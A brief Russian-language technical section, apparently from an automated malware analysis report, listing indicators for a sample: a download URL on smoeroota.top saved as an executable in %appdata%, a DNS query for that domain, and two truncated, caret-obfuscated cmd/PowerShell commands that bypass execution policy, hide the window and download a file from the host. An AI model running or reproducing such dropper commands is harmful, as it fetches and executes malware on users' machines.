Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^owe^RS^heLl.eXe ^-E^X^eC^U^TIonP^OliCy BY^paSs^ -^nO^pR^O^F^i^l^E -wIn^DOwS^tYLE^ ^hiDDe^N (^Ne^W^-^OB^jeCt^ ^S^ys^teM.^Net^.weBcl^IEn^t)^.dOwNlOADfIlE('http://smoeroota.to...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "p^owe^RS^heLl.eXe ^-E^X^eC^U^TIonP^OliCy BY^paSs^ -^nO^pR^O^F^i^l^E -wIn^DOwS^tYLE^ ^hiDDe^N (^Ne^W^-^OB^jeCt^ ^S^ys^teM.^Net^.weBcl^IEn^t)^.dOwNlOADfIlE('http://smoeroota.to...' (со скрытым окном)